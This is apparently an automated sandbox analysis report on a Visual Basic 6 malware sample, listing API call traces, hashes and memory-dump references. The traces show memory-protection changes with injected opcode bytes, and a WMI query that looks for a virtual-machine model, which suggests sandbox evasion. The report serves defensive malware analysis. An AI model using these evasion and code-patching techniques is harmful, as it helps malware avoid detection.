                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Free$Move$#644$ErrorSystem$LockUnlock$Addref$Copy$ListRedim$#526#616AddressAllocAnsiCheckHandleHresultModuleNofreeProcStr2VargVirtual
                  • String ID: P$P
                  • API String ID: 551447660-159270896
                  • Opcode ID: 553f291f0f747e983998f026e747dca2e32c171b32f163b8e801cedfd75e318a
                  • Instruction ID: db506244587a8e4b5ed4fd47b367a1be35ae69282482a22f34a39c9f3ae64843
                  • Opcode Fuzzy Hash: 553f291f0f747e983998f026e747dca2e32c171b32f163b8e801cedfd75e318a
                  • Instruction Fuzzy Hash: E822F2B5C0010DABCB15EFA5D881DEEB7BCAF18304B14413FE615B7261DB38AA09DB65

                  Control-flow Graph

                  APIs
                  • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,0000000F,00000000,?,00000000,?), ref: 004FD6D3
                  • __vbaNew.MSVBVM60(0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD6E5
                  • __vbaObjSet.MSVBVM60(?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD6EF
                  • __vbaCastObj.MSVBVM60(00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD6F5
                  • __vbaObjSet.MSVBVM60(00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD6FF
                  • __vbaFreeObj.MSVBVM60(00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD707
                  • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000,?), ref: 004FD713
                  • #644.MSVBVM60(00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000), ref: 004FD719
                  • __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,00000000), ref: 004FD724
                  • #644.MSVBVM60(00401006,00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FD72D
                  • #644.MSVBVM60(?,00401006,00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FD739
                  • #644.MSVBVM60(00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FD744
                  • #644.MSVBVM60(?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FD750
                  • __vbaAryLock.MSVBVM60(?,?,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004FD777
                  • #644.MSVBVM60(?,?,?,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000), ref: 004FD78B
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000), ref: 004FD797
                  • __vbaObjSetAddref.MSVBVM60(?,00000000,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000,?), ref: 004FD7B7
                  • #644.MSVBVM60(00000000,?,00000000,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000), ref: 004FD7BD
                  • __vbaFreeObj.MSVBVM60(00000000,?,00000000,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000,00000000), ref: 004FD7C8
                  • #644.MSVBVM60(?,00000000,?,00000000,?,00000000,00000000,?,00401006,?,00401006,00000000,?,00000000,00000000,00000000), ref: 004FD7D1
                  • __vbaAryLock.MSVBVM60(?,?,00401006,00000000,?,00000000,?,00000000,?,00000000,00000000,?,00401006,?,00401006,00000000), ref: 004FD7E6
                  • #644.MSVBVM60(?,?,?,00401006,00000000,?,00000000,?,00000000,?,00000000,00000000,?,00401006,?,00401006), ref: 004FD7FA
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,00401006,00000000,?,00000000,?,00000000,?,00000000,00000000,?,00401006,?), ref: 004FD806
                  • #644.MSVBVM60(?,?,?,?,?,00401006,00000000,?,00000000,?,00000000,?,00000000,00000000,?,00401006), ref: 004FD815
                  • #644.MSVBVM60(005032B0,00000000,00401006,?,?,?,?,?,00401006,00000000,?,00000000,?,00000000,?,00000000), ref: 004FD846
                  • #644.MSVBVM60(?,-0000000C,00000000,005032B0,00000000,00401006,?,?,?,?,?,00401006,00000000,?,00000000,?), ref: 004FD865
                  • __vbaAryLock.MSVBVM60(?,00000000,-0000000C,?,-0000000C,00000000,005032B0,00000000,00401006,?,?,?,?,?,00401006,00000000), ref: 004FD88A
                  • __vbaStrCat.MSVBVM60(0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,005032B0,00000000,00401006,?,?,?), ref: 004FD8B1
                  • __vbaStrMove.MSVBVM60(0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,005032B0,00000000,00401006,?,?,?), ref: 004FD8BB
                  • __vbaI4Str.MSVBVM60(00000000,0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,005032B0,00000000,00401006,?,?), ref: 004FD8C1
                  • VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040BCF8,0040BCF0,?,00000040,?,00000000,-0000000C,?,-0000000C,00000000,005032B0,00000000,00401006), ref: 004FD8CA
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BD6C,0000002C,?,?,?,?,?,00000000,?), ref: 004FD8DE
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,00000000,?), ref: 004FD8E7
                  • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000,?), ref: 004FD8EF
                  • #644.MSVBVM60(005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD8FD
                  • __vbaStrCat.MSVBVM60(0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD90F
                  • __vbaStrMove.MSVBVM60(0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD919
                  • __vbaStrCat.MSVBVM60(0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD924
                  • #638.MSVBVM60(?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD936
                  • __vbaFreeStr.MSVBVM60(00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD94D
                  • __vbaFreeVar.MSVBVM60(00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000,?), ref: 004FD955
                  • __vbaAryLock.MSVBVM60(?,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000), ref: 004FD97A
                  • #644.MSVBVM60(?,?,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?), ref: 004FD98F
                  • __vbaAryUnlock.MSVBVM60(?,?,?,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?), ref: 004FD99B
                  • #644.MSVBVM60(00000040,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?,?,?,?,?,?,00000000), ref: 004FD9C6
                  • #644.MSVBVM60(0C2474FF,00000000,00401002,00000040,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?), ref: 004FD9E6
                  • #644.MSVBVM60(0C2454FF,00000000,00400FFE,0C2474FF,00000000,00401002,00000040,00000040,-0050321C,?,0040BFDC,00000000,0040BE84,0040BE7C,005032B0,?), ref: 004FDA06
                  • #644.MSVBVM60(10244C8B,00000000,00400FFA,0C2454FF,00000000,00400FFE,0C2474FF,00000000,00401002,00000040,00000040,-0050321C,?,0040BFDC,00000000,0040BE84), ref: 004FDA26
                  • #644.MSVBVM60(2CC20189,00000000,00400FF6,10244C8B,00000000,00400FFA,0C2454FF,00000000,00400FFE,0C2474FF,00000000,00401002,00000040,00000040,-0050321C,?), ref: 004FDA42
                  • #644.MSVBVM60(?,00000000,00400FF2,2CC20189,00000000,00400FF6,10244C8B,00000000,00400FFA,0C2454FF,00000000,00400FFE,0C2474FF,00000000,00401002,00000040), ref: 004FDA6C
                  • #644.MSVBVM60(?,?,00000000,00400FF2,2CC20189,00000000,00400FF6,10244C8B,00000000,00400FFA,0C2454FF,00000000,00400FFE,0C2474FF,00000000,00401002), ref: 004FDA78
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BD6C,00000020,?,?,?,?,?,00000000,?), ref: 004FDAB3
                  • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,00000000,?), ref: 004FDAD7
                  • #644.MSVBVM60(?,?,?,?,?,?,?,00000000,?), ref: 004FDAEB
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,00000000,?), ref: 004FDAF7
                  • #644.MSVBVM60(?,?,?,?,?,?,00000000,?), ref: 004FDB14
                  • __vbaAryDestruct.MSVBVM60(00000000,?,004FDB62,00000000,00401006,?,?,?,?,?,?,00000000,?), ref: 004FDB54
                  • __vbaFreeObj.MSVBVM60(00000000,?,004FDB62,00000000,00401006,?,?,?,?,?,?,00000000,?), ref: 004FDB5C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$#644$Free$LockUnlock$AddrefCheckHresultMove$#638CastDestructProtectRedimVirtual
                  • String ID: 0#P$@
                  • API String ID: 3983459261-1041023437
                  • Opcode ID: e50784fa3a6fd6a427e6abdc73a454a512dbe0d9856517324edcd74bed24c3d3
                  • Instruction ID: f0eb4e79f683e12d67832882fb04396479c4377e2849d027f13eeb184f72f7f6
                  • Opcode Fuzzy Hash: e50784fa3a6fd6a427e6abdc73a454a512dbe0d9856517324edcd74bed24c3d3
                  • Instruction Fuzzy Hash: 8EE1E9B5D00219ABCF14EFE5CC45DDEBBBDEF09704B10452AF601BB2A2DA789905CB64

                  Control-flow Graph

                  APIs
                  • __vbaRedim.MSVBVM60(00000080,00000004,00000000,00000003,00000001,0000000F,00000000,?,?,?), ref: 004FDD08
                  • __vbaNew.MSVBVM60(0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD1A
                  • __vbaObjSet.MSVBVM60(?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD24
                  • __vbaCastObj.MSVBVM60(00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD2A
                  • __vbaObjSet.MSVBVM60(?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD34
                  • __vbaObjSetAddref.MSVBVM60(005032AC,00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD43
                  • __vbaFreeObjList.MSVBVM60(00000002,?,?,005032AC,00000000,?,00000000,00000000,?,00000000,0040BD5C,0040BD6C), ref: 004FDD52
                  • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD66
                  • #644.MSVBVM60(00000000,?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD6C
                  • __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,0040BD5C,0040BD6C,?,?,?,?,?,?,?), ref: 004FDD77
                  • __vbaAryLock.MSVBVM60(004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDA8
                  • #644.MSVBVM60(B445C7BC,004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDBD
                  • __vbaAryUnlock.MSVBVM60(004FA910,B445C7BC,004FA910,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDC9
                  • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDF4
                  • #644.MSVBVM60(00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDDFA
                  • __vbaFreeObj.MSVBVM60(00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDE04
                  • #644.MSVBVM60(00000004,00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDE0D
                  • __vbaAryLock.MSVBVM60(004FA910,00000000,00000000,00000000,00000004,00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C), ref: 004FDE20
                  • #644.MSVBVM60(B445C7BC,004FA910,00000000,00000000,00000000,00000004,00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000), ref: 004FDE34
                  • __vbaAryUnlock.MSVBVM60(004FA910,B445C7BC,004FA910,00000000,00000000,00000000,00000004,00000000,?,00000000,00000000,00000008,00000008,00000000,?,00000000), ref: 004FDE40
                  • #644.MSVBVM60(?,004FA910,B445C7BC,004FA910,00000000,00000000,00000000,00000004,00000000,?,00000000,00000000,00000008,00000008,00000000,?), ref: 004FDE4F
                  • __vbaRedim.MSVBVM60(00000080,00000004,?,00000003,00000001,00000010,00000000,00000000,00000000,?,004FA910,B445C7BC,004FA910,00000000,00000000,00000000), ref: 004FDE7E
                  • #644.MSVBVM60(-00000004,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDE8A
                  • #644.MSVBVM60(?,?,00000000,-00000004,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000,0040BD5C,0040BD6C), ref: 004FDEA7
                  • __vbaAryLock.MSVBVM60(004FA910,?,00000000,?,?,?,00000000,-00000004,00000000,00000000,00000008,00000008,00000000,?,00000000,00000000), ref: 004FDEC6
                  • __vbaStrCat.MSVBVM60(0040BCF8,0040BCF0,B445C7BC,00000040,004FA910,?,00000000,?,?,?,00000000,-00000004,00000000,00000000,00000008,00000008), ref: 004FDEF2
                  • __vbaStrMove.MSVBVM60(0040BCF8,0040BCF0,B445C7BC,00000040,004FA910,?,00000000,?,?,?,00000000,-00000004,00000000,00000000,00000008,00000008), ref: 004FDEFC
                  • __vbaI4Str.MSVBVM60(00000000,0040BCF8,0040BCF0,B445C7BC,00000040,004FA910,?,00000000,?,?,?,00000000,-00000004,00000000,00000000,00000008), ref: 004FDF02
                  • VirtualProtect.KERNELBASE(00000000,00000000,00000000,0040BCF8,0040BCF0,B445C7BC,00000040,004FA910,?,00000000,?,?,?,00000000,-00000004,00000000), ref: 004FDF10
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BD6C,0000002C,?,?,?,?,?,?,?), ref: 004FDF2A
                  • __vbaAryUnlock.MSVBVM60(004FA910,?,?,?,?,?,?,?), ref: 004FDF33
                  • __vbaFreeStr.MSVBVM60(004FA910,?,?,?,?,?,?,?), ref: 004FDF3B
                  • #644.MSVBVM60(-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF44
                  • __vbaStrCat.MSVBVM60(0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF56
                  • __vbaStrMove.MSVBVM60(0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF60
                  • __vbaStrCat.MSVBVM60(0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF6B
                  • #638.MSVBVM60(?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF7E
                  • __vbaFreeStr.MSVBVM60(00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF92
                  • __vbaFreeVar.MSVBVM60(00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910,?,?,?,?,?,?,?), ref: 004FDF9A
                  • __vbaAryLock.MSVBVM60(004FA910,?,?,00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910), ref: 004FDFB9
                  • #644.MSVBVM60(B445C7BC,004FA910,?,?,00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910), ref: 004FDFCE
                  • __vbaAryUnlock.MSVBVM60(004FA910,B445C7BC,004FA910,?,?,00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910), ref: 004FDFDA
                  • #644.MSVBVM60(00000040,?,00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910), ref: 004FE002
                  • #644.MSVBVM60(0424448B,00000004,00000000,00000004,00000040,?,00000040,?,?,0040BFDC,00000000,0040BE84,0040BE7C,-00000004,004FA910), ref: 004FE021
                  • #644.MSVBVM60(408B008B,00000008,00000000,00000004,0424448B,00000004,00000000,00000004,00000040,?,00000040,?,?,0040BFDC,00000000,0040BE84), ref: 004FE040
                  • #644.MSVBVM60(20C4832C,0000000C,00000000,00000004,408B008B,00000008,00000000,00000004,0424448B,00000004,00000000,00000004,00000040,?,00000040,?), ref: 004FE05F
                  • #644.MSVBVM60(E02474FF,00000010,00000000,00000004,20C4832C,0000000C,00000000,00000004,408B008B,00000008,00000000,00000004,0424448B,00000004,00000000,00000004), ref: 004FE07E
                  • VirtualProtect.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,00000014,00000000,00000004,E02474FF,00000010), ref: 004FE0C2
                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040BD6C,00000020,?,?,?,?,?,?,?), ref: 004FE0DC
                  • __vbaAryLock.MSVBVM60(004FA910,?,?,?,?,?,?,?,?,?), ref: 004FE0F7
                  • #644.MSVBVM60(B445C7BC,004FA910,?,?,?,?,?,?,?,?,?), ref: 004FE10B
                  • __vbaAryUnlock.MSVBVM60(004FA910,B445C7BC,004FA910,?,?,?,?,?,?,?,?,?), ref: 004FE117
                  • #644.MSVBVM60(00000004,?,?,?,?,?,?,?,?), ref: 004FE134
                  • __vbaAryDestruct.MSVBVM60(00000000,00000000,004FE18D,00000000,00000000,00000004,?,?,?,?,?,?,?,?), ref: 004FE17D
                  • __vbaAryDestruct.MSVBVM60(00000000,?,00000000,00000000,004FE18D,00000000,00000000,00000004,?,?,?,?,?,?,?,?), ref: 004FE187
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$#644$Free$LockUnlock$Addref$CheckDestructHresultMoveProtectRedimVirtual$#638CastList
                  • String ID: @$P#P
                  • API String ID: 22558003-150970136
                  • Opcode ID: b14baa83287f729ac0bef4a09b83980f4760d7391e248bdb05709bd8091a2ead
                  • Instruction ID: 7c2a6812e5be39e45aad52766f83e2d24fcbde20faffd0501096b073d3e6497d
                  • Opcode Fuzzy Hash: b14baa83287f729ac0bef4a09b83980f4760d7391e248bdb05709bd8091a2ead
                  • Instruction Fuzzy Hash: 03E1CBB1D00219ABCB14EFE5CD85DDEBBBDEF08704F10452AF601BB2A6D6799904CB64

                  Control-flow Graph

                  APIs
                  • __vbaVarDup.MSVBVM60 ref: 004FC578
                  • #626.MSVBVM60(?,?,0000000A), ref: 004FC589
                  • __vbaVarZero.MSVBVM60(?,?,0000000A), ref: 004FC597
                  • __vbaFreeVarList.MSVBVM60(00000002,?,0000000A,?,?,0000000A), ref: 004FC5A6
                  • __vbaVarLateMemCallLd.MSVBVM60(?,?,ExecQuery,00000001,?,00000002,?,0000000A,?,?,0000000A), ref: 004FC5D3
                  • __vbaVarZero.MSVBVM60(?,?,?,?,0000000A), ref: 004FC5E3
                  • __vbaForEachVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004FC60F
                  • __vbaVarLateMemCallLd.MSVBVM60(?,?,Model,00000000,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004FC626
                  • __vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,0000000A), ref: 004FC633
                  • __vbaNextEachVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004FC658
                  • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004FC679
                  • #633.MSVBVM60(?,?,?,0000000A,00000001,?,?,?,?,?,?,?,?,?,?,0000000A), ref: 004FC699
                  • #635.MSVBVM60(?,?,?,?,0000000A,00000001,?,?,?,?,?,?,?,?,?,?), ref: 004FC6A2
                  • __vbaFreeVarList.MSVBVM60(00000003,00000002,0000000A,?,?,?,?,?,0000000A,00000001,?,?,?,?,?,?), ref: 004FC6B8
                  • __vbaAryUnlock.MSVBVM60(?,004FC71E,?,?,?,?,?,?,?,?,0000000A), ref: 004FC6E5
                  • __vbaFreeObj.MSVBVM60(?,004FC71E,?,?,?,?,?,?,?,?,0000000A), ref: 004FC6F0
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,004FC71E,?,?,?,?,?,?,?,?,0000000A), ref: 004FC705
                  • __vbaFreeVar.MSVBVM60(?,?,004FC71E,?,?,?,?,?,?,?,?,0000000A), ref: 004FC710
                  • __vbaFreeVar.MSVBVM60(?,?,004FC71E,?,?,?,?,?,?,?,?,0000000A), ref: 004FC718
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2149240422.000000000040C000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2149191302.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149204500.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149222931.000000000040B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149318005.0000000000502000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000503000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149332571.0000000000505000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2149364332.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_UoktqWamLR.jbxd
                  Similarity
                  • API ID: __vba$Free$List$CallEachLateZero$#626#633#635MoveNextUnlock
                  • String ID: ExecQuery$Model$Select * from Win32_ComputerSystem$Virtual$winmgmts:\\.\root\cimv2$"P
                  • API String ID: 1937198248-455726391
                  • Opcode ID: 05a183285e00056742a97b2277e8207855d09def9f1ac3c529a5fd331c141f11
                  • Instruction ID: be2067835e52feb06568d63d961a0afe91277575c7399f656b16464723e55622
                  • Opcode Fuzzy Hash: 05a183285e00056742a97b2277e8207855d09def9f1ac3c529a5fd331c141f11
                  • Instruction Fuzzy Hash: 8651B6B2D0025CAADB11DFD1CD81BDEB7BCAB08304F50416BA249B7151EB786B498FA5

                  Control-flow Graph

                  APIs
                  • __vbaVarAdd.MSVBVM60(?,?,?,?,?,0040BEAC,?,00000000), ref: 004FBF9E
                  • __vbaVarSub.MSVBVM60(?,00000000,00000000,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FBFAF
                  • __vbaI4Var.MSVBVM60(00000000,?,00000000,00000000,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FBFB5
                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,00000000,00000000,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FBFC6
                  • __vbaAryLock.MSVBVM60(?,?,0040BEAC,?,00000000), ref: 004FBFD9
                  • #644.MSVBVM60(?,?,?,0040BEAC,?,00000000), ref: 004FBFE8
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,0040BEAC,?,00000000), ref: 004FBFF3
                  • #644.MSVBVM60(?,?,?,?,?,0040BEAC,?,00000000), ref: 004FBFFC
                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00000000,00000000,?,?,?,?,?,0040BEAC,?), ref: 004FC01D
                  • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FC02B
                  • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FC037
                  • __vbaSetSystemError.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BEAC,?), ref: 004FC06A
                  • __vbaAryUnlock.MSVBVM60(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BEAC), ref: 004FC073
                  • __vbaAryUnlock.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC07C
                  • __vbaVarMove.MSVBVM60(?,?,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC097
                  • __vbaVarTstEq.MSVBVM60(00008003,?,?,?,00000002,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC0BA
                  • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,00008003,?,?,?,00000002,?,?,?,?), ref: 004FC0D5
                  • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040BEAC,?,00000000), ref: 004FC0E3
                    • Part of subcall function 004FBE71: __vbaRefVarAry.MSVBVM60(0040BEAC), ref: 004FBEA4
                    • Part of subcall function 004FBE71: __vbaUbound.MSVBVM60(00000001,00000000,0040BEAC), ref: 004FBEAD
                    • Part of subcall function 004FBE71: __vbaVarMove.MSVBVM60(00000001,00000000,0040BEAC), ref: 004FBEC2
                  • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BEAC,?), ref: 004FC0F2
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040BEAC), ref: 004FC0FD
                  • __vbaAryLock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC109
                  • #644.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC118
                  • __vbaAryUnlock.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC123
                  • __vbaFreeVar.MSVBVM60(004FC17A,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC169
                  • __vbaAryDestruct.MSVBVM60(00000000,?,004FC17A,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004FC174
